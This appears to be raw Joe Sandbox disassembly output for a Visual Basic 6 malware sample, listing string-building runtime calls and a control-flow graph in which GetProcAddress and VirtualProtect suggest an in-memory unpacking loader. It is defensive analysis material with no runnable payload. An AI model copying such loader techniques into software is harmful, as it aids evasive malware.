                  • __vbaStrCat.MSVBVM60(0040BD08,00000000,0040BFB4,00000000,0040BD08,00000000,0040BFE4,00000000,0040B8F4,0040BFEC,0040BD20,00000000,0040BCD8,00000000,0040BFD4,00000000), ref: 004FCD1B
                  • __vbaStrMove.MSVBVM60(0040BD08,00000000,0040BFB4,00000000,0040BD08,00000000,0040BFE4,00000000,0040B8F4,0040BFEC,0040BD20,00000000,0040BCD8,00000000,0040BFD4,00000000), ref: 004FCD25
                  • __vbaStrCat.MSVBVM60(0040BD20,00000000,0040BD08,00000000,0040BFB4,00000000,0040BD08,00000000,0040BFE4,00000000,0040B8F4,0040BFEC,0040BD20,00000000,0040BCD8,00000000), ref: 004FCD30
                  • __vbaStrMove.MSVBVM60(0040BD20,00000000,0040BD08,00000000,0040BFB4,00000000,0040BD08,00000000,0040BFE4,00000000,0040B8F4,0040BFEC,0040BD20,00000000,0040BCD8,00000000), ref: 004FCD3A
                  • __vbaStrCat.MSVBVM60(0040BCE0,00000000,0040BD20,00000000,0040BD08,00000000,0040BFB4,00000000,0040BD08,00000000,0040BFE4,00000000,0040B8F4,0040BFEC,0040BD20,00000000), ref: 004FCD45
                  • __vbaStrMove.MSVBVM60(0040BCE0,00000000,0040BD20,00000000,0040BD08,00000000,0040BFB4,00000000,0040BD08,00000000,0040BFE4,00000000,0040B8F4,0040BFEC,0040BD20,00000000), ref: 004FCD4F
                  • __vbaStrCat.MSVBVM60(0040BFF4,00000000,0040BCE0,00000000,0040BD20,00000000,0040BD08,00000000,0040BFB4,00000000,0040BD08,00000000,0040BFE4,00000000,0040B8F4,0040BFEC), ref: 004FCD5A
                  • __vbaStrMove.MSVBVM60(0040BFF4,00000000,0040BCE0,00000000,0040BD20,00000000,0040BD08,00000000,0040BFB4,00000000,0040BD08,00000000,0040BFE4,00000000,0040B8F4,0040BFEC), ref: 004FCD64
                  • __vbaStrCat.MSVBVM60(0040BFFC,00000000,0040BFF4,00000000,0040BCE0,00000000,0040BD20,00000000,0040BD08,00000000,0040BFB4,00000000,0040BD08,00000000,0040BFE4,00000000), ref: 004FCD6F
                  • __vbaStrMove.MSVBVM60(0040BFFC,00000000,0040BFF4,00000000,0040BCE0,00000000,0040BD20,00000000,0040BD08,00000000,0040BFB4,00000000,0040BD08,00000000,0040BFE4,00000000), ref: 004FCD79
                  • __vbaStrCat.MSVBVM60(0040BFBC,00000000,0040BFFC,00000000,0040BFF4,00000000,0040BCE0,00000000,0040BD20,00000000,0040BD08,00000000,0040BFB4,00000000,0040BD08,00000000), ref: 004FCD84
                  • __vbaStrMove.MSVBVM60(0040BFBC,00000000,0040BFFC,00000000,0040BFF4,00000000,0040BCE0,00000000,0040BD20,00000000,0040BD08,00000000,0040BFB4,00000000,0040BD08,00000000), ref: 004FCD8E
                  • #644.MSVBVM60(00000000,0040BFBC,00000000,0040BFFC,00000000,0040BFF4,00000000,0040BCE0,00000000,0040BD20,00000000,0040BD08,00000000,0040BFB4,00000000,0040BD08), ref: 004FCD94
                  • #644.MSVBVM60(00000000,00000000,0040BFBC,00000000,0040BFFC,00000000,0040BFF4,00000000,0040BCE0,00000000,0040BD20,00000000,0040BD08,00000000,0040BFB4,00000000), ref: 004FCD9E
                  • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000,0040BFBC,00000000,0040BFFC,00000000,0040BFF4,00000000,0040BCE0,00000000,0040BD20,00000000,0040BD08,00000000), ref: 004FCDAF
                  • __vbaFreeStrList.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,0040BFBC), ref: 004FCDDE
                  • __vbaStrCat.MSVBVM60(0040BD30,0040C004,00000000,0040BD08,00000000,0040BFB4,00000000,0040BD08,00000000,0040BFE4,00000000,0040B8F4,0040BFEC,0040BD20,00000000,0040BCD8), ref: 004FCE03
                  • __vbaStrMove.MSVBVM60(0040BD30,0040C004,00000000,0040BD08,00000000,0040BFB4,00000000,0040BD08,00000000,0040BFE4,00000000,0040B8F4,0040BFEC,0040BD20,00000000,0040BCD8), ref: 004FCE0D
                  • __vbaStrCat.MSVBVM60(0040C00C,00000000,0040BD30,0040C004,00000000,0040BD08,00000000,0040BFB4,00000000,0040BD08,00000000,0040BFE4,00000000,0040B8F4,0040BFEC,0040BD20), ref: 004FCE18
                  • __vbaStrMove.MSVBVM60(0040C00C,00000000,0040BD30,0040C004,00000000,0040BD08,00000000,0040BFB4,00000000,0040BD08,00000000,0040BFE4,00000000,0040B8F4,0040BFEC,0040BD20), ref: 004FCE22
                  • __vbaStrCat.MSVBVM60(0040BD10,00000000,0040C00C,00000000,0040BD30,0040C004,00000000,0040BD08,00000000,0040BFB4,00000000,0040BD08,00000000,0040BFE4,00000000,0040B8F4), ref: 004FCE2D
                  • __vbaStrMove.MSVBVM60(0040BD10,00000000,0040C00C,00000000,0040BD30,0040C004,00000000,0040BD08,00000000,0040BFB4,00000000,0040BD08,00000000,0040BFE4,00000000,0040B8F4), ref: 004FCE37
                  • __vbaStrCat.MSVBVM60(0040C014,00000000,0040BD10,00000000,0040C00C,00000000,0040BD30,0040C004,00000000,0040BD08,00000000,0040BFB4,00000000,0040BD08,00000000,0040BFE4), ref: 004FCE42
                  • __vbaStrMove.MSVBVM60(0040C014,00000000,0040BD10,00000000,0040C00C,00000000,0040BD30,0040C004,00000000,0040BD08,00000000,0040BFB4,00000000,0040BD08,00000000,0040BFE4), ref: 004FCE4C
                  • __vbaStrCat.MSVBVM60(0040BFBC,00000000,0040C014,00000000,0040BD10,00000000,0040C00C,00000000,0040BD30,0040C004,00000000,0040BD08,00000000,0040BFB4,00000000,0040BD08), ref: 004FCE57
                  • __vbaStrMove.MSVBVM60(0040BFBC,00000000,0040C014,00000000,0040BD10,00000000,0040C00C,00000000,0040BD30,0040C004,00000000,0040BD08,00000000,0040BFB4,00000000,0040BD08), ref: 004FCE61
                  • __vbaStrCat.MSVBVM60(0040BD38,00000000,0040BFBC,00000000,0040C014,00000000,0040BD10,00000000,0040C00C,00000000,0040BD30,0040C004,00000000,0040BD08,00000000,0040BFB4), ref: 004FCE6C
                  • __vbaStrMove.MSVBVM60(0040BD38,00000000,0040BFBC,00000000,0040C014,00000000,0040BD10,00000000,0040C00C,00000000,0040BD30,0040C004,00000000,0040BD08,00000000,0040BFB4), ref: 004FCE76
                  • __vbaStrCat.MSVBVM60(0040BCD0,00000000,0040BD38,00000000,0040BFBC,00000000,0040C014,00000000,0040BD10,00000000,0040C00C,00000000,0040BD30,0040C004,00000000,0040BD08), ref: 004FCE7D
                  • __vbaStrMove.MSVBVM60(0040BCD0,00000000,0040BD38,00000000,0040BFBC,00000000,0040C014,00000000,0040BD10,00000000,0040C00C,00000000,0040BD30,0040C004,00000000,0040BD08), ref: 004FCE87
                  • #644.MSVBVM60(00000000,0040BCD0,00000000,0040BD38,00000000,0040BFBC,00000000,0040C014,00000000,0040BD10,00000000,0040C00C,00000000,0040BD30,0040C004,00000000), ref: 004FCE8D
                  • #644.MSVBVM60(00000000,00000000,0040BCD0,00000000,0040BD38,00000000,0040BFBC,00000000,0040C014,00000000,0040BD10,00000000,0040C00C,00000000,0040BD30,0040C004), ref: 004FCE97
                  • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000,0040BCD0,00000000,0040BD38,00000000,0040BFBC,00000000,0040C014,00000000,0040BD10,00000000,0040C00C,00000000), ref: 004FCEA8
                  • __vbaFreeStrList.MSVBVM60(00000007,?,?,?,?,?,?,?,?,00000000,00000000,00000000,0040BCD0,00000000,0040BD38,00000000), ref: 004FCECB
                  • __vbaStrCat.MSVBVM60(0040B648,0040BFBC,0040C014,00000000,0040BD10,00000000,0040C00C,00000000,0040BD30,0040C004,00000000,0040BD08,00000000,0040BFB4,00000000,0040BD08), ref: 004FCEF0
                  • __vbaStrMove.MSVBVM60(0040B648,0040BFBC,0040C014,00000000,0040BD10,00000000,0040C00C,00000000,0040BD30,0040C004,00000000,0040BD08,00000000,0040BFB4,00000000,0040BD08), ref: 004FCEFA
                  • __vbaStrCat.MSVBVM60(0040B648,00000000,0040B648,0040BFBC,0040C014,00000000,0040BD10,00000000,0040C00C,00000000,0040BD30,0040C004,00000000,0040BD08,00000000,0040BFB4), ref: 004FCF05
                  • __vbaStrMove.MSVBVM60(0040B648,00000000,0040B648,0040BFBC,0040C014,00000000,0040BD10,00000000,0040C00C,00000000,0040BD30,0040C004,00000000,0040BD08,00000000,0040BFB4), ref: 004FCF0F
                  • __vbaStrCat.MSVBVM60(0040BC7C,00000000,0040B648,00000000,0040B648,0040BFBC,0040C014,00000000,0040BD10,00000000,0040C00C,00000000,0040BD30,0040C004,00000000,0040BD08), ref: 004FCF1A
                  • __vbaStrMove.MSVBVM60(0040BC7C,00000000,0040B648,00000000,0040B648,0040BFBC,0040C014,00000000,0040BD10,00000000,0040C00C,00000000,0040BD30,0040C004,00000000,0040BD08), ref: 004FCF24
                  • __vbaStrCat.MSVBVM60(0040B8F4,00000000,0040BC7C,00000000,0040B648,00000000,0040B648,0040BFBC,0040C014,00000000,0040BD10,00000000,0040C00C,00000000,0040BD30,0040C004), ref: 004FCF2B
                  • __vbaStrMove.MSVBVM60(0040B8F4,00000000,0040BC7C,00000000,0040B648,00000000,0040B648,0040BFBC,0040C014,00000000,0040BD10,00000000,0040C00C,00000000,0040BD30,0040C004), ref: 004FCF35
                  • __vbaStrCat.MSVBVM60(0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040B648,00000000,0040B648,0040BFBC,0040C014,00000000,0040BD10,00000000,0040C00C,00000000), ref: 004FCF3C
                  • __vbaStrMove.MSVBVM60(0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040B648,00000000,0040B648,0040BFBC,0040C014,00000000,0040BD10,00000000,0040C00C,00000000), ref: 004FCF46
                  • #644.MSVBVM60(00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040B648,00000000,0040B648,0040BFBC,0040C014,00000000,0040BD10,00000000,0040C00C), ref: 004FCF4C
                  • #644.MSVBVM60(00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040B648,00000000,0040B648,0040BFBC,0040C014,00000000,0040BD10,00000000), ref: 004FCF56
                  • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000,0040B648,00000000,0040B648,0040BFBC,0040C014,00000000), ref: 004FCF67
                  • __vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?,?,00000000,00000000,00000000,0040B8FC,00000000,0040B8F4,00000000,0040BC7C,00000000), ref: 004FCF82
                  • __vbaStrCat.MSVBVM60(0040BC7C,0040BFBC,0040BC7C,00000000,0040B648,00000000,0040B648,0040BFBC,0040C014,00000000,0040BD10,00000000,0040C00C,00000000,0040BD30,0040C004), ref: 004FCFA7
                  • __vbaStrMove.MSVBVM60(0040BC7C,0040BFBC,0040BC7C,00000000,0040B648,00000000,0040B648,0040BFBC,0040C014,00000000,0040BD10,00000000,0040C00C,00000000,0040BD30,0040C004), ref: 004FCFB1
                  • #644.MSVBVM60(00000000,0040BC7C,0040BFBC,0040BC7C,00000000,0040B648,00000000,0040B648,0040BFBC,0040C014,00000000,0040BD10,00000000,0040C00C,00000000,0040BD30), ref: 004FCFB7
                  • #644.MSVBVM60(00000000,00000000,0040BC7C,0040BFBC,0040BC7C,00000000,0040B648,00000000,0040B648,0040BFBC,0040C014,00000000,0040BD10,00000000,0040C00C,00000000), ref: 004FCFC1
                  • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000,0040BC7C,0040BFBC,0040BC7C,00000000,0040B648,00000000,0040B648,0040BFBC,0040C014,00000000,0040BD10,00000000), ref: 004FCFD2
                  • __vbaFreeStr.MSVBVM60(?,00000000,00000000,00000000,0040BC7C,0040BFBC,0040BC7C,00000000,0040B648,00000000,0040B648,0040BFBC,0040C014,00000000,0040BD10,00000000), ref: 004FCFDA
                  • __vbaStrCat.MSVBVM60(0040BCD0,0040C01C,?,00000000,00000000,00000000,0040BC7C,0040BFBC,0040BC7C,00000000,0040B648,00000000,0040B648,0040BFBC,0040C014,00000000), ref: 004FCFF8
                  • __vbaStrMove.MSVBVM60(0040BCD0,0040C01C,?,00000000,00000000,00000000,0040BC7C,0040BFBC,0040BC7C,00000000,0040B648,00000000,0040B648,0040BFBC,0040C014,00000000), ref: 004FD002
                  • __vbaStrCat.MSVBVM60(0040BD10,00000000,0040BCD0,0040C01C,?,00000000,00000000,00000000,0040BC7C,0040BFBC,0040BC7C,00000000,0040B648,00000000,0040B648,0040BFBC), ref: 004FD00D
                  • __vbaStrMove.MSVBVM60(0040BD10,00000000,0040BCD0,0040C01C,?,00000000,00000000,00000000,0040BC7C,0040BFBC,0040BC7C,00000000,0040B648,00000000,0040B648,0040BFBC), ref: 004FD017
                  • __vbaStrCat.MSVBVM60(0040BD20,00000000,0040BD10,00000000,0040BCD0,0040C01C,?,00000000,00000000,00000000,0040BC7C,0040BFBC,0040BC7C,00000000,0040B648,00000000), ref: 004FD022
                  • __vbaStrMove.MSVBVM60(0040BD20,00000000,0040BD10,00000000,0040BCD0,0040C01C,?,00000000,00000000,00000000,0040BC7C,0040BFBC,0040BC7C,00000000,0040B648,00000000), ref: 004FD02C
                  • __vbaStrCat.MSVBVM60(0040C014,00000000,0040BD20,00000000,0040BD10,00000000,0040BCD0,0040C01C,?,00000000,00000000,00000000,0040BC7C,0040BFBC,0040BC7C,00000000), ref: 004FD037
                  • __vbaStrMove.MSVBVM60(0040C014,00000000,0040BD20,00000000,0040BD10,00000000,0040BCD0,0040C01C,?,00000000,00000000,00000000,0040BC7C,0040BFBC,0040BC7C,00000000), ref: 004FD041
                  • __vbaStrCat.MSVBVM60(0040BC7C,00000000,0040C014,00000000,0040BD20,00000000,0040BD10,00000000,0040BCD0,0040C01C,?,00000000,00000000,00000000,0040BC7C,0040BFBC), ref: 004FD04C
                  • __vbaStrMove.MSVBVM60(0040BC7C,00000000,0040C014,00000000,0040BD20,00000000,0040BD10,00000000,0040BCD0,0040C01C,?,00000000,00000000,00000000,0040BC7C,0040BFBC), ref: 004FD056
                  • __vbaStrCat.MSVBVM60(0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000,0040BD20,00000000,0040BD10,00000000,0040BCD0,0040C01C,?,00000000,00000000,00000000), ref: 004FD05D
                  • __vbaStrMove.MSVBVM60(0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000,0040BD20,00000000,0040BD10,00000000,0040BCD0,0040C01C,?,00000000,00000000,00000000), ref: 004FD067
                  • __vbaStrCat.MSVBVM60(0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000,0040BD20,00000000,0040BD10,00000000,0040BCD0,0040C01C,?,00000000), ref: 004FD06E
                  • __vbaStrMove.MSVBVM60(0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000,0040BD20,00000000,0040BD10,00000000,0040BCD0,0040C01C,?,00000000), ref: 004FD078
                  • __vbaStrCat.MSVBVM60(0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000,0040BD20,00000000,0040BD10,00000000,0040BCD0,0040C01C), ref: 004FD083
                  • __vbaStrMove.MSVBVM60(0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000,0040BD20,00000000,0040BD10,00000000,0040BCD0,0040C01C), ref: 004FD08D
                  • __vbaStrCat.MSVBVM60(0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000,0040BD20,00000000,0040BD10,00000000), ref: 004FD094
                  • __vbaStrMove.MSVBVM60(0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000,0040BD20,00000000,0040BD10,00000000), ref: 004FD09E
                  • __vbaStrCat.MSVBVM60(0040B8FC,00000000,0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000,0040BD20,00000000), ref: 004FD0A5
                  • __vbaStrMove.MSVBVM60(0040B8FC,00000000,0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000,0040BD20,00000000), ref: 004FD0AF
                  • __vbaStrCat.MSVBVM60(0040BCD0,00000000,0040B8FC,00000000,0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000), ref: 004FD0B6
                  • __vbaStrMove.MSVBVM60(0040BCD0,00000000,0040B8FC,00000000,0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000), ref: 004FD0C0
                  • __vbaStrCat.MSVBVM60(0040BCD8,00000000,0040BCD0,00000000,0040B8FC,00000000,0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000), ref: 004FD0CB
                  • __vbaStrMove.MSVBVM60(0040BCD8,00000000,0040BCD0,00000000,0040B8FC,00000000,0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000), ref: 004FD0D5
                  • #644.MSVBVM60(00000000,0040BCD8,00000000,0040BCD0,00000000,0040B8FC,00000000,0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C), ref: 004FD0DB
                  • #644.MSVBVM60(00000000,00000000,0040BCD8,00000000,0040BCD0,00000000,0040B8FC,00000000,0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000), ref: 004FD0E5
                  • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000,0040BCD8,00000000,0040BCD0,00000000,0040B8FC,00000000,0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000), ref: 004FD0F6
                  • __vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004FD12D
                  • __vbaStrCat.MSVBVM60(0040BD30,0040C024,00000000,0040BD20,00000000,0040BD10,00000000,0040BCD0,0040C01C,?,00000000,00000000,00000000,0040BC7C,0040BFBC,0040BC7C), ref: 004FD152
                  • __vbaStrMove.MSVBVM60(0040BD30,0040C024,00000000,0040BD20,00000000,0040BD10,00000000,0040BCD0,0040C01C,?,00000000,00000000,00000000,0040BC7C,0040BFBC,0040BC7C), ref: 004FD15C
                  • __vbaStrCat.MSVBVM60(0040BD38,00000000,0040BD30,0040C024,00000000,0040BD20,00000000,0040BD10,00000000,0040BCD0,0040C01C,?,00000000,00000000,00000000,0040BC7C), ref: 004FD167
                  • __vbaStrMove.MSVBVM60(0040BD38,00000000,0040BD30,0040C024,00000000,0040BD20,00000000,0040BD10,00000000,0040BCD0,0040C01C,?,00000000,00000000,00000000,0040BC7C), ref: 004FD171
                  • __vbaStrCat.MSVBVM60(0040BCC8,00000000,0040BD38,00000000,0040BD30,0040C024,00000000,0040BD20,00000000,0040BD10,00000000,0040BCD0,0040C01C,?,00000000,00000000), ref: 004FD17C
                  • __vbaStrMove.MSVBVM60(0040BCC8,00000000,0040BD38,00000000,0040BD30,0040C024,00000000,0040BD20,00000000,0040BD10,00000000,0040BCD0,0040C01C,?,00000000,00000000), ref: 004FD186
                  • __vbaStrCat.MSVBVM60(0040C014,00000000,0040BCC8,00000000,0040BD38,00000000,0040BD30,0040C024,00000000,0040BD20,00000000,0040BD10,00000000,0040BCD0,0040C01C,?), ref: 004FD191
                  • __vbaStrMove.MSVBVM60(0040C014,00000000,0040BCC8,00000000,0040BD38,00000000,0040BD30,0040C024,00000000,0040BD20,00000000,0040BD10,00000000,0040BCD0,0040C01C,?), ref: 004FD19B
                  • __vbaStrCat.MSVBVM60(0040BC7C,00000000,0040C014,00000000,0040BCC8,00000000,0040BD38,00000000,0040BD30,0040C024,00000000,0040BD20,00000000,0040BD10,00000000,0040BCD0), ref: 004FD1A6
                  • __vbaStrMove.MSVBVM60(0040BC7C,00000000,0040C014,00000000,0040BCC8,00000000,0040BD38,00000000,0040BD30,0040C024,00000000,0040BD20,00000000,0040BD10,00000000,0040BCD0), ref: 004FD1B0
                  • __vbaStrCat.MSVBVM60(0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000,0040BCC8,00000000,0040BD38,00000000,0040BD30,0040C024,00000000,0040BD20,00000000,0040BD10), ref: 004FD1B7
                  • __vbaStrMove.MSVBVM60(0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000,0040BCC8,00000000,0040BD38,00000000,0040BD30,0040C024,00000000,0040BD20,00000000,0040BD10), ref: 004FD1C1
                  • __vbaStrCat.MSVBVM60(0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000,0040BCC8,00000000,0040BD38,00000000,0040BD30,0040C024,00000000,0040BD20), ref: 004FD1C8
                  • __vbaStrMove.MSVBVM60(0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000,0040BCC8,00000000,0040BD38,00000000,0040BD30,0040C024,00000000,0040BD20), ref: 004FD1D2
                  • __vbaStrCat.MSVBVM60(0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000,0040BCC8,00000000,0040BD38,00000000,0040BD30,0040C024), ref: 004FD1DD
                  • __vbaStrMove.MSVBVM60(0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000,0040BCC8,00000000,0040BD38,00000000,0040BD30,0040C024), ref: 004FD1E7
                  • __vbaStrCat.MSVBVM60(0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000,0040BCC8,00000000,0040BD38,00000000), ref: 004FD1EE
                  • __vbaStrMove.MSVBVM60(0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000,0040BCC8,00000000,0040BD38,00000000), ref: 004FD1F8
                  • __vbaStrCat.MSVBVM60(0040B8FC,00000000,0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000,0040BCC8,00000000), ref: 004FD1FF
                  • __vbaStrMove.MSVBVM60(0040B8FC,00000000,0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000,0040BCC8,00000000), ref: 004FD209
                  • __vbaStrCat.MSVBVM60(0040BCD0,00000000,0040B8FC,00000000,0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000), ref: 004FD210
                  • __vbaStrMove.MSVBVM60(0040BCD0,00000000,0040B8FC,00000000,0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000,0040C014,00000000), ref: 004FD21A
                  • __vbaStrCat.MSVBVM60(0040BCD8,00000000,0040BCD0,00000000,0040B8FC,00000000,0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000), ref: 004FD225
                  • __vbaStrMove.MSVBVM60(0040BCD8,00000000,0040BCD0,00000000,0040B8FC,00000000,0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C,00000000), ref: 004FD22F
                  • #644.MSVBVM60(00000000,0040BCD8,00000000,0040BCD0,00000000,0040B8FC,00000000,0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000,0040BC7C), ref: 004FD235
                  • #644.MSVBVM60(00000000,00000000,0040BCD8,00000000,0040BCD0,00000000,0040B8FC,00000000,0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000,0040BCD0,00000000), ref: 004FD23E
                  • __vbaSetSystemError.MSVBVM60(00000000,00000000,00000000,00000000,0040BCD8,00000000,0040BCD0,00000000,0040B8FC,00000000,0040B8FC,00000000,0040BD18,00000000,0040B8F4,00000000), ref: 004FD24C
                  • __vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 004FD28E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$Move$#644$ErrorFreeSystem$List
                  • String ID:
                  • API String ID: 3381585117-0
                  • Opcode ID: b23108fc929bcb6527bdb69678a65547a6f1ef07f370f7d08a42e16d6feb8e7f
                  • Instruction ID: cc6ea91582036697d6a25cbd10eb72af74331e746556e9a3f15e669c3dd57453
                  • Opcode Fuzzy Hash: b23108fc929bcb6527bdb69678a65547a6f1ef07f370f7d08a42e16d6feb8e7f
                  • Instruction Fuzzy Hash: 8962AE75D001096ADB19FBE1CC82DEF767CAF19344B14423FB611BA2E6EE385905C6E8

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 50 4f9f8b-4fa3af __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat call 4ffb2a GetModuleHandleW __vbaFreeStrList __vbaFreeVar call 4fdb76 __vbaStrVarVal __vbaStrToAnsi GetProcAddress __vbaFreeStrList __vbaFreeVar __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove #644 GetModuleHandleW __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrToAnsi GetProcAddress __vbaFreeStrList __vbaRedim __vbaNew __vbaObjSet __vbaCastObj __vbaObjSet __vbaObjSetAddref __vbaFreeObjList __vbaObjSetAddref #644 __vbaFreeObj #644 call 4a78c6 call 4a78d5 59 4fa3b5-4fa3b8 50->59 60 4fa40d-4fa56d __vbaObjSetAddref #644 __vbaFreeObj #644 call 4a78e3 __vbaAryLock #644 __vbaAryUnlock #644 call 4a78c6 __vbaRedim #644 call 4a78c6 #644 call 4a78c6 __vbaAryLock __vbaStrCat __vbaStrMove __vbaI4Str VirtualProtect 59->60 61 4fa3ba-4fa40b __vbaAryLock #644 __vbaAryUnlock call 4a78c6 59->61 72 4fa56f-4fa57f __vbaHresultCheckObj 60->72 73 4fa584-4fa5c4 __vbaAryUnlock __vbaFreeStr #644 call 4a78c6 call 4a78d5 60->73 61->59 72->73 78 4fa5c5-4fa5c8 73->78 79 4fa61b-4fa730 #644 call 4a78e3 #644 call 4a78e3 #644 call 4a78e3 #644 call 4a78e3 #644 call 4a78e3 VirtualProtect 78->79 80 4fa5ca-4fa619 __vbaAryLock #644 __vbaAryUnlock call 4a78c6 78->80 93 4fa747-4fa757 call 4a78d5 79->93 94 4fa732-4fa742 __vbaHresultCheckObj 79->94 80->78 97 4fa758-4fa75a 93->97 94->93 98 4fa75c-4fa7a3 __vbaAryLock #644 __vbaAryUnlock call 4a78c6 97->98 99 4fa7a5-4fa87c #644 call 4a78c6 #644 call 4a78c6 #644 call 4a78c6 call 4faa72 __vbaFreeVar __vbaAryDestruct 97->99 98->97
                  APIs
                  • __vbaStrCat.MSVBVM60(0040B650,0040B648), ref: 004FA013
                  • __vbaStrMove.MSVBVM60(0040B650,0040B648), ref: 004FA01D
                  • __vbaStrCat.MSVBVM60(bvm,00000000,0040B650,0040B648), ref: 004FA028
                  • __vbaStrMove.MSVBVM60(bvm,00000000,0040B650,0040B648), ref: 004FA032
                  • __vbaStrCat.MSVBVM60(0040B668,00000000,bvm,00000000,0040B650,0040B648), ref: 004FA03D
                    • Part of subcall function 004FFB2A: __vbaVarVargNofree.MSVBVM60 ref: 004FFB60
                    • Part of subcall function 004FFB2A: __vbaStrVarVal.MSVBVM60(00000000,00000000), ref: 004FFB6A
                    • Part of subcall function 004FFB2A: #644.MSVBVM60(00000000,00000000,00000000), ref: 004FFB70
                    • Part of subcall function 004FFB2A: __vbaFreeStr.MSVBVM60(00000000,00000000,00000000), ref: 004FFB7B
                  • GetModuleHandleW.KERNEL32(00000000,?,0040B668,00000000,bvm,00000000,0040B650,0040B648), ref: 004FA055
                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,0040B668,00000000,bvm,00000000,0040B650,0040B648), ref: 004FA069
                  • __vbaFreeVar.MSVBVM60 ref: 004FA074
